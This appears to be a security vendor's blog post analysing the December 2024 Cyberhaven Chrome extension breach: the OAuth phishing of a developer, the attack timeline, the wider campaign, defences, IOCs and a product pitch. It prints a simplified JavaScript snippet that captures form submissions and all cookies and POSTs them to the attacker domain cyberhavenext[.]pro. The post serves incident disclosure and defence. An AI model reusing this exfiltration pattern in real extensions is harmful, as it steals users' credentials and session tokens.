7 min read|

The Cyberhaven Chrome Extension Breach

On Christmas Eve 2024, attackers compromised Cyberhaven's Chrome extension and pushed a malicious update to 400,000+ users. Here's exactly what happened, the attack timeline, and how to prevent this from happening to your organization.

The Cyberhaven Chrome Extension Breach: What Happened and How to Protect Your Organization

On December 24, 2024, while most security teams were on holiday, attackers compromised the Chrome extension of Cyberhaven—a data loss prevention company—and pushed a malicious update that exfiltrated sensitive data from approximately 400,000 users. The irony of a security company being breached through its own browser extension underscores a critical blind spot in enterprise security.

This wasn't an isolated incident. In the weeks following, security researchers discovered that at least 35 other Chrome extensions had been compromised using the same attack methodology, affecting over 2.6 million users combined.


The Attack Timeline

December 24, 2024 — Initial Compromise

At approximately 8:32 PM EST, an attacker successfully phished a Cyberhaven employee using a convincing OAuth consent screen. The phishing email appeared to come from Google Chrome Web Store Developer Support, claiming the extension violated Chrome Web Store policies and required immediate action.

The employee clicked the link and authorized what appeared to be a legitimate Google application. In reality, they granted the attacker full access to their Chrome Web Store developer account.

December 24-25, 2024 — Malicious Update Deployed

Within hours, the attacker:

  1. Accessed the Chrome Web Store Developer Dashboard
  2. Modified the extension's source code to include data exfiltration capabilities
  3. Pushed version 24.10.4 to the Chrome Web Store
  4. Chrome's auto-update mechanism began distributing the malicious version

The malicious code targeted:

  • Facebook Ads authentication tokens
  • Session cookies for various platforms
  • User credentials entered in browser forms
  • Corporate authentication tokens

December 25, 2024 — Detection

Cyberhaven's security team detected the breach after observing unusual API calls from their extension. The malicious version was live for approximately 31 hours before being pulled.

December 26, 2024 — Public Disclosure

Cyberhaven published a security advisory acknowledging the breach and providing indicators of compromise.


Technical Analysis: How the Malicious Code Worked

The attackers injected approximately 60 lines of JavaScript that:

// Simplified representation of the attack pattern
// Actual malicious code was obfuscated

// 1. Hooked into form submissions
document.addEventListener('submit', captureCredentials);

// 2. Extracted cookies for targeted domains
chrome.cookies.getAll({}, exfiltrateCookies);

// 3. Sent data to attacker-controlled server
fetch('https://cyberhavenext[.]pro/api/collect', {
  method: 'POST',
  body: JSON.stringify(stolenData)
});

The exfiltration domain cyberhavenext[.]pro was registered just hours before the attack—a common indicator of planned, targeted attacks rather than opportunistic exploitation.

What Made This Attack Effective

  1. Trusted Publisher: Users trusted the extension because Cyberhaven is a legitimate security company
  2. Auto-Updates: Chrome automatically pushed the malicious update without user intervention
  3. Broad Permissions: The extension already had permissions to access website data
  4. Holiday Timing: Reduced security team coverage during Christmas

The Broader Campaign: 35+ Extensions Compromised

Security researchers at Secure Annex discovered the Cyberhaven breach was part of a larger campaign. At least 35 extensions were compromised using similar phishing techniques:

ExtensionUsers AffectedCompromise Date
Cyberhaven400,000+Dec 24, 2024
ParrotTalks40,000+Dec 2024
Uvoice40,000+Dec 2024
VPNCity50,000+Dec 2024
Internxt VPN10,000+Dec 2024
31 others~2M totalVarious

Common Attack Pattern

All compromises followed the same playbook:

  1. Reconnaissance: Identify extension developers via Chrome Web Store listings
  2. Phishing: Send fake policy violation emails impersonating Google
  3. OAuth Abuse: Trick developers into authorizing malicious OAuth apps
  4. Code Injection: Add data exfiltration code to legitimate extension
  5. Auto-Update Distribution: Let Chrome's update system deliver the payload

Why Traditional Security Tools Missed This

Network Security Couldn't See It

The malicious extension made HTTPS requests that appeared legitimate. Without SSL inspection specifically configured for browser extension traffic, network monitoring tools saw encrypted traffic to what looked like a CDN.

Endpoint Detection Had Blind Spots

Most EDR solutions focus on process execution, file system changes, and known malware signatures. Browser extensions operate within the browser's sandboxed environment, making their activities less visible to traditional endpoint agents.

No Extension Inventory Existed

Ask most security teams: "What browser extensions are installed across your organization?" Few can answer accurately. Without an inventory, you can't monitor for changes, and you can't respond to incidents like this one.


How to Protect Your Organization

1. Build an Extension Inventory (Today)

You cannot protect what you cannot see. Start by discovering every extension installed across your organization:

For Chrome Enterprise users:

chrome://policy

Check ExtensionInstallForcelist and ExtensionInstallBlocklist policies.

For broader visibility: Use a browser extension security platform like Extension Auditor to automatically discover and inventory extensions across all managed browsers.

2. Implement Extension Allowlisting

Move from a permissive model (allow everything) to a restrictive model (allow only approved extensions):

Chrome Enterprise Policy:

{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": [
    "extension_id_1",
    "extension_id_2"
  ]
}

3. Monitor for Permission Changes

Legitimate extensions don't suddenly need new permissions. Set up alerts for:

  • New permissions requested by existing extensions
  • Extensions changing their host permissions
  • Extensions being removed from the Chrome Web Store

4. Review Extension Permissions Before Approval

Before adding any extension to your allowlist, review:

  • Host permissions: Which websites can it access?
  • API permissions: Can it access cookies, tabs, storage?
  • Publisher history: How long has this developer been active?
  • Update frequency: Is it actively maintained?

5. Have an Incident Response Plan for Extensions

Your IR plan should include:

  • How to force-remove an extension across all managed browsers
  • Communication templates for affected users
  • Steps to reset compromised credentials
  • Process for forensic analysis of extension-based attacks

Indicators of Compromise (IOCs)

If you had the Cyberhaven extension installed between December 24-25, 2024, check for:

Malicious Domains

cyberhavenext[.]pro

Affected Version

Cyberhaven extension version 24.10.4
  1. Remove Cyberhaven extension version 24.10.4 immediately
  2. Reset passwords for all services accessed during the exposure window
  3. Revoke and regenerate API tokens, especially Facebook Ads tokens
  4. Review access logs for suspicious activity
  5. Enable 2FA on all accounts if not already enabled

Lessons for Security Teams

Browser Extensions Are a Supply Chain Risk

We audit our code dependencies. We verify our infrastructure providers. But browser extensions—software that runs with elevated privileges in every employee's browser—often escape scrutiny.

The Cyberhaven breach demonstrates that even security-focused companies can become attack vectors. The question isn't whether to trust specific publishers; it's whether you have visibility and control over this attack surface.

Auto-Updates Are a Double-Edged Sword

Automatic updates are great for patching vulnerabilities quickly. They're also great for attackers who compromise an extension's publishing credentials—their malicious code gets pushed to all users automatically.

Consider implementing staged rollouts for extension updates, or at minimum, monitoring update events.

Phishing Still Works

The initial compromise came from a phishing email. Despite years of security awareness training, a single employee authorizing a malicious OAuth application gave attackers the keys to 400,000 browsers.

Developer accounts need stronger protections:

  • Hardware security keys for Chrome Web Store access
  • Multiple approvers for extension updates
  • Anomaly detection on publishing activity

What We're Building at Extension Auditor

The Cyberhaven breach is exactly why we built Extension Auditor. After seeing this attack unfold on Christmas Eve 2024, it became clear that organizations need:

  1. Complete visibility into every extension across every browser
  2. Risk scoring that goes beyond simple permission counts
  3. Continuous monitoring for changes, removals, and permission escalations
  4. Actionable policies that balance security with productivity

The browser is the organization's largest unmonitored attack surface. We're building the tools to change that.


Further Reading


Key Takeaways

  1. 400,000+ users were affected by the Cyberhaven breach in just 31 hours
  2. 35+ extensions were compromised using the same phishing technique
  3. Auto-updates distributed malicious code without user action
  4. Traditional security tools have blind spots for browser extension attacks
  5. Extension allowlisting and monitoring are essential defenses

Don't wait for your organization to be the next headline. Scan your extensions now and understand your risk.